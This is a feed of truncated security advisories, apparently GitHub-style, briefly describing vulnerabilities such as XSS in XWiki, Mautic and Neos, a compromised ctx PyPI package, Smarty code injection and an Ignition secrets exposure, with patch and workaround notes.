The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code that collected the content of os.environ.items() when instantiating Ctx objects. The captured environment varia…
[fof/upload] Possible cross-site scripting attack via unsanitized SVG files in FoF Upload
Impact
If FoF Upload is configured to allow the uploading of SVG files (image/svg+xml), navigating directly to an SVG file URI could execute arbitrary Javascript code decided by an attacker.
This Javascript code could include the execution of HTTP web …
[org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki] XSS in wiki manager join wiki page
Impact
We found a possible XSS vector in the WikiManager.JoinWiki wiki page related to the “requestJoin” field.
Patches
The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, 13.10.3.
Workarounds
The easiest workaround is to edit the wiki page …
[org.xwiki.platform:xwiki-platform-flamingo-theme-ui] XSS in the Flamingo theme manager
Impact
We found a possible XSS vector in the FlamingoThemesCode.WebHomeSheet wiki page related to the “newThemeName” form field.
Patches
The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, 13.10.3.
Workarounds
The easiest workaround is to edi…
[com.vaadin:vaadin] Possible information disclosure inside TreeGrid component with default data provider
Description
The default configuration of a TreeGrid component uses Object::toString as a key on the client-side and server communication in Vaadin 14.8.5 through 14.8.9, 22.0.6 through 22.0.14, 23.0.0.beta2 through 23.0.8 and 23.1.0.alpha1 through 23.1…
[mautic/core] Cross-site Scripting vulnerability in Mautic’s tracking pixel functionality
Impact
Mautic allows you to track open rates by using tracking pixels.
The tracking information is stored together with extra metadata of the tracking request.
The output isn’t sufficiently filtered when showing the metadata of the tracking informatio…
[pocketmine/pocketmine-mp] Denial-of-service vulnerability processing large chat messages containing many newlines
Impact
PocketMine-MP caps maximum chat message length at 512 Unicode characters, or about 2048 bytes. No more than 2 chat messages may be sent per tick. However, due to legacy reasons, incoming chat message blobs are split by \n, and each part is treat…
[smarty/smarty] PHP Code Injection by malicious block or filename
Impact
Template authors could inject php code by choosing a malicous {block} name or {include} file name. Sites that cannot fully trust template authors should update asap.
Patches
Please upgrade to the most recent version of Smarty v3 or v4.
Workaroun…
[neos/neos] XSS in various backend modules due to (un)escaping in JS notification module
The notification module displaying flash messages unscapes HTML coming from the server, resulting in XSS vulnerabilities with various names and labels of entities (eg. workspace title or media title). This however means you must be a logged in user wit…
[github.com/coreos/ignition] Ignition config accessible to unprivileged software on VMware
Impact
Unprivileged software in VMware VMs, including software running in unprivileged containers, can retrieve an Ignition config stored in a hypervisor guestinfo variable or OVF environment. If the Ignition config contains secrets, this can result i…